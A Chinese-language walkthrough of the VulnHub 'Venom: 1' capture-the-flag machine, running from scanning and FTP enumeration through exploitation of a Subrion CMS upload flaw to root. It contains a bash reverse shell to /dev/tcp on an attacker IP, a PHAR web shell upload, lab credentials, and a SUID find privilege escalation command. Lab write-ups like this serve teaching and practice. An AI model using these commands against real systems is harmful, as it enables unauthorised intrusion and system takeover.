Venom: 1靶场

Venom: 1

来自 <Venom: 1 ~ VulnHub>

 

1，将两台虚拟机网络连接都改为NAT模式

2，攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182，靶场IP192.168.23.130

3，对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.130

存在21，22，80，443，7070，8084端口开放着服务，访问之

 

4，匿名登录一下ftp服务

ftp anonymous@192.168.23.130

无权限，登录失败

 

5，再访问80端口开放的http服务

扫描存在的网站子目录

dirsearch -u http://192.168.23.130 -x 404,403

页面源代码存在一串MD5值，解密得到hostinger

再看看443端口开放的http服务

再次扫描存在的网站子目录

dirsearch -u http://192.168.23.130:443 -x 404,403

除了页面源代码以外依然什么都没有

 

6，接着信息收集，使用enum4linux进行扫描

enum4linux -a 192.168.23.130

得到用户名hostinger密码是hostinger，尝试登录ftp服务器

ftp hostinger@192.168.23.130

发现一个文件夹，里面存在一个文本文件

尝试解密base64字符串

echo WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= | base64 -d | base64 -d | base64 -d

echo aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= | base64 -d

得到原句：You need to follow the 'hostinger' on standard vigenere cipher also on Vigenère cipher: Encrypt and decrypt online - cryptii                                    

直接解码L7f9l8@J#p%Ue+Q1234

 

7，然后需要在hosts 文件中添加 venom.box，访问

echo "192.168.23.130 venom.box" >>/etc/hosts

http://venom.box/

尝试登录一下，账户密码：dora /E7r9t8@Q#h%Hy+M1234

登陆成功，扫描识别网站目录

whatweb -v http://venom.box/

搜索网站CMS

searchsploit  Subrion CMS 

选择文件上传利用

searchsploit -m 49876.py

8，尝试getshell

成功getshell，然后再尝试反弹shell

bash -i >& /dev/tcp/192.168.23.182/4444 0>&1

反弹shell失败，然后再尝试上传kali的自带的木马

访问这个网站触发反弹shell

http://venom.box/uploads/shell.phar

与此同时打开对4444端口的监听

成功getshell

 

9，然后使用python脚本启动一个可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

信息收集一下

cd /var/backup.bak

cat .backup.txt

user: hostinger

password: hostinger

 

10，继续信息收集

cd /var/www/html/subrion

ls -al

cat robots.txt

cat .gitignore

cat composer.json

cd /var/www/html/subrion/backup

ls -al

cat .htaccess

得到一个字符串FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

 

11，查看存在哪些用户

 ls -al /home

上线hostinger，用户名就是密码。然后信息收集一下，可以查看执行过的系统命令

su hostinger

cat .bash_history

经常切换用户nathan，发现了查新suid程序的命令：

find / -perm -u=s -type f 2>/dev/null

 

12，切换至nathan用户试试，密码信息收集的时候就已经知道了

su nathan

FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

成功得到了user.txt。

接下来看看提权方式，先看看sudo提权

sudo允许我们以root权限执行su命令，但是提权失败。

再看看suid提权方法

find / -perm -4000 -exec ls -al {} \; 2>/dev/null

find命令存在suid权限，属主是root用户，尝试提权

find . -exec /bin/bash -p \; -quit

最后成功得到flag